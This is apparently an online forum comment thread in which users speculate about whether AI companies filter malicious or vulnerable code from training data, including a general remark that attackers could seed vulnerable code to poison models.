undefined

points

[-]

Everyone’s (well, except Anthropic, they seem to have preserved a bit of taste) approach is the more data the better, so the databases of stolen content (erm, models) are memorizing crap.

by datadrivenangel1 days ago|

prev|

[-]

This was a compromise of the library owners github acccounts apparently, so this is not a related scenario to dangerous code in the training data.

I assume most labs don't do anything to deal with this, and just hope that it gets trained out because better code should be better rewarded in theory?

by Havoc1 days ago|

prev|

[-]

By betting that it dilutes away and not worrying about it too much. Bit like dropping radioactive barrels into the deep ocean.

by ting01 days ago|

parent|

[-]

Yeah, and that won't hold up for long. Just wait until some well resourced attacker replicates their exploit into tens of thousands of sources it knows will be scraped and included in the training set to bias the model to produce their vulnerable code. Only a matter of time.

by Imustaskforhelp1 days ago|

prev|

[-]

I am pretty sure that such measures aren't taken by AI companies, though I may be wrong.

by alansaber1 days ago|

parent|

[-]

The API/online model inference definitely runs through some kind of edge safeguarding models which could do this.